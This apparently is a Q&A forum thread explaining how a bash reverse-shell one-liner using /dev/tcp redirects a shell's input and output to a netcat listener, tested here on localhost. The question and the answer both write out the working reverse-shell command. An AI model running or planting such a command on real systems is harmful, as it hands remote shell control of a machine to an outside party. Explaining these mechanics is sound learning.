How does this bash reverse shell accept input?

Question

I have a listener running on localhost for port 449 using netcat.

In a separate terminal also running on localhost I can run the following command:

bash -c "bash -i >&/dev/tcp/127.0.0.1/449 0>&1"

I am then able to enter commands through the netcat connection and they execute successfully. I can break down the above command and I am able to see that the bash shell above writes its stderr and stdout to the socket file descriptor, which is sent to my machine and ends up listened to by netcat. Additionally, I can see that the standard input is send to standard output, and is then executed by the outer bash command.

A few questions on this:

1. What is the mechanism that sets up the bash terminal to accept the standard input from netcat? The stdin isn't redirected anywhere in the command.
2. How does the outer bash shell execute more than a single command output from the inner bash shell? My initial thoughts were that it would only be able to execute a single command.

Answer 1

Outer bash only launch inner bash, and cannot take commands after that. So you can run directly inner bash :

bash -i >&/dev/tcp/127.0.0.1/449 0>&1

>&/dev/tcp/127.0.0.1/449 redirects stdout and stderr to TCP connection.

0>&1 redirects stdin to the same connection.